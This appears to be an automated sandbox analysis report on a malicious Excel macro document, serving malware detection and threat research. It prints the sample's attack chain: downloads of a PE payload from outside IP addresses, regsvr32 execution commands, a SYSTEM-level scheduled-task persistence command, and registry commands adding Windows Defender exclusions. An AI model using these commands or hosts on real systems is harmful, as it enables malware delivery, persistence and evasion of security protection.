Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Compensation-2308017-09272021.xls

Overview

General Information

Sample Name:Compensation-2308017-09272021.xls
Analysis ID:491573
MD5:52b4fcf57e4fb524cf33503e8a5272ef
SHA1:d5b80e8ceaa81361da9ff6d18a4927dfd3b47d1a
SHA256:a5bc073043d0729f825df8302f425148ce8c65214a87094fe96fe9039ac7f088
Tags:xls
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (drops PE files)
Sigma detected: Schedule system process
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Office process drops PE file
Writes to foreign memory regions
Uses cmd line tools excessively to alter registry or file data
Sigma detected: Microsoft Office Product Spawning Windows Shell
Allocates memory in foreign processes
Injects code into the Windows Explorer (explorer.exe)
PE file has nameless sections
Sigma detected: Regsvr32 Command Line Without DLL
Machine Learning detection for dropped file
Drops PE files to the user root directory
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Yara detected hidden Macro 4.0 in Excel
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Downloads executable code via HTTP
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Uses reg.exe to modify the Windows registry
Document contains embedded VBA macros
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2712 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 1980 cmdline: regsvr32 -silent ..\Drezd.red MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 1312 cmdline: -silent ..\Drezd.red MD5: 432BE6CF7311062633459EEF6B242FB5)
        • explorer.exe (PID: 2124 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
          • schtasks.exe (PID: 2592 cmdline: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn icvxxob /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 18:04 /ET 18:16 MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
    • regsvr32.exe (PID: 3040 cmdline: regsvr32 -silent ..\Drezd1.red MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 1760 cmdline: -silent ..\Drezd1.red MD5: 432BE6CF7311062633459EEF6B242FB5)
        • explorer.exe (PID: 2988 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
        • WMIADAP.exe (PID: 2988 cmdline: wmiadap.exe /F /T /R MD5: 005247E3057BC5D5C3F8C6F886FFC10C)
    • regsvr32.exe (PID: 2520 cmdline: regsvr32 -silent ..\Drezd2.red MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 3060 cmdline: -silent ..\Drezd2.red MD5: 432BE6CF7311062633459EEF6B242FB5)
        • explorer.exe (PID: 284 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
  • regsvr32.exe (PID: 2848 cmdline: regsvr32.exe -s 'C:\Users\user\Drezd.red' MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2952 cmdline: -s 'C:\Users\user\Drezd.red' MD5: 432BE6CF7311062633459EEF6B242FB5)
      • explorer.exe (PID: 2544 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
        • reg.exe (PID: 2976 cmdline: C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Tououa' /d '0' MD5: 9D0B3066FE3D1FD345E86BC7BCCED9E4)
        • reg.exe (PID: 2132 cmdline: C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Gnydpduzkfqu' /d '0' MD5: 9D0B3066FE3D1FD345E86BC7BCCED9E4)
  • regsvr32.exe (PID: 1704 cmdline: regsvr32.exe -s 'C:\Users\user\Drezd.red' MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2076 cmdline: -s 'C:\Users\user\Drezd.red' MD5: 432BE6CF7311062633459EEF6B242FB5)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
Compensation-2308017-09272021.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -silent ..\Drezd.red, CommandLine: regsvr32 -silent ..\Drezd.red, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2712, ProcessCommandLine: regsvr32 -silent ..\Drezd.red, ProcessId: 1980
    Sigma detected: Regsvr32 Command Line Without DLLShow sources
    Source: Process startedAuthor: Florian Roth: Data: Command: -silent ..\Drezd.red, CommandLine: -silent ..\Drezd.red, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: regsvr32 -silent ..\Drezd.red, ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 1980, ProcessCommandLine: -silent ..\Drezd.red, ProcessId: 1312

    Persistence and Installation Behavior:

    barindex
    Sigma detected: Schedule system processShow sources
    Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn icvxxob /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 18:04 /ET 18:16, CommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn icvxxob /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 18:04 /ET 18:16, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\SysWOW64\explorer.exe, ParentImage: C:\Windows\SysWOW64\explorer.exe, ParentProcessId: 2124, ProcessCommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn icvxxob /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 18:04 /ET 18:16, ProcessId: 2592

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Machine Learning detection for dropped fileShow sources
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[3].datJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[2].datJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[1].datJoe Sandbox ML: detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Binary string: amstream.pdb source: explorer.exe, 00000005.00000003.441003457.0000000002821000.00000004.00000001.sdmp
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000AEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0008AEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_1000AEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_000EAEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_1000AEB4 FindFirstFileW,FindNextFileW,

    Software Vulnerabilities:

    barindex
    Document exploit detected (drops PE files)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: 44466.7516903935[1].dat.0.drJump to dropped file
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 190.14.37.178:80
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 190.14.37.178:80
    Source: excel.exeMemory has grown: Private usage: 4MB later: 33MB
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 16:02:56 GMTContent-Type: application/octet-streamContent-Length: 387072Connection: keep-aliveX-Powered-By: PHP/5.4.16Accept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment; filename="44466.7516903935.dat"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 85 8c 3b 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 03 01 00 0a 03 00 00 f6 01 00 00 00 00 00 00 10 00 00 00 10 00 00 00 20 03 00 00 00 00 10 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 06 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 20 03 00 70 00 00 00 c8 10 04 00 7c 01 00 00 00 20 04 00 f4 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 04 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c 09 03 00 00 10 00 00 00 0a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 65 64 61 74 61 00 00 70 00 00 00 00 20 03 00 00 02 00 00 00 0e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 20 00 00 00 30 03 00 00 14 00 00 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 61 74 61 00 00 00 54 bf 00 00 00 50 03 00 00 c0 00 00 00 24 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 74 00 48 06 00 00 00 10 04 00 00 08 00 00 00 e4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f4 0b 01 00 00 20 04 00 00 0c 01 00 00 ec 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 50 00 00 00 30 05 00 00 50 00 00 00 f8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 80 05 00 00 50 00 00 00 48 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 d0 05 00 00 50 00 00 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 16:02:59 GMTContent-Type: application/octet-streamContent-Length: 387072Connection: keep-aliveX-Powered-By: PHP/5.4.16Accept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment; filename="44466.7516903935.dat"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 85 8c 3b 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 03 01 00 0a 03 00 00 f6 01 00 00 00 00 00 00 10 00 00 00 10 00 00 00 20 03 00 00 00 00 10 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 06 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 20 03 00 70 00 00 00 c8 10 04 00 7c 01 00 00 00 20 04 00 f4 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 04 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c 09 03 00 00 10 00 00 00 0a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 65 64 61 74 61 00 00 70 00 00 00 00 20 03 00 00 02 00 00 00 0e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 20 00 00 00 30 03 00 00 14 00 00 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 61 74 61 00 00 00 54 bf 00 00 00 50 03 00 00 c0 00 00 00 24 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 74 00 48 06 00 00 00 10 04 00 00 08 00 00 00 e4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f4 0b 01 00 00 20 04 00 00 0c 01 00 00 ec 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 50 00 00 00 30 05 00 00 50 00 00 00 f8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 80 05 00 00 50 00 00 00 48 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 d0 05 00 00 50 00 00 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 16:03:00 GMTContent-Type: application/octet-streamContent-Length: 387072Connection: keep-aliveX-Powered-By: PHP/5.4.16Accept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment; filename="44466.7516903935.dat"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 85 8c 3b 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 03 01 00 0a 03 00 00 f6 01 00 00 00 00 00 00 10 00 00 00 10 00 00 00 20 03 00 00 00 00 10 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 06 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 20 03 00 70 00 00 00 c8 10 04 00 7c 01 00 00 00 20 04 00 f4 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 04 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c 09 03 00 00 10 00 00 00 0a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 65 64 61 74 61 00 00 70 00 00 00 00 20 03 00 00 02 00 00 00 0e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 20 00 00 00 30 03 00 00 14 00 00 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 61 74 61 00 00 00 54 bf 00 00 00 50 03 00 00 c0 00 00 00 24 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 74 00 48 06 00 00 00 10 04 00 00 08 00 00 00 e4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f4 0b 01 00 00 20 04 00 00 0c 01 00 00 ec 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 50 00 00 00 30 05 00 00 50 00 00 00 f8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 80 05 00 00 50 00 00 00 48 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 d0 05 00 00 50 00 00 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: global trafficHTTP traffic detected: GET /44466.7516903935.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.14.37.178Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /44466.7516903935.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.183.96.67Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /44466.7516903935.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.250.148.213Connection: Keep-Alive
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
    Source: regsvr32.exe, 00000004.00000002.440286146.0000000002100000.00000002.00020000.sdmp, explorer.exe, 00000005.00000002.722386782.0000000000820000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
    Source: regsvr32.exe, 00000003.00000002.441359204.0000000001DB0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.439921319.0000000001D00000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.451658912.0000000001CF0000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.448814500.0000000001C80000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
    Source: regsvr32.exe, 00000004.00000002.440286146.0000000002100000.00000002.00020000.sdmp, explorer.exe, 00000005.00000002.722386782.0000000000820000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.449319415.0000000002170000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[1].datJump to behavior
    Source: global trafficHTTP traffic detected: GET /44466.7516903935.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.14.37.178Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /44466.7516903935.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.183.96.67Connection: Keep-Alive
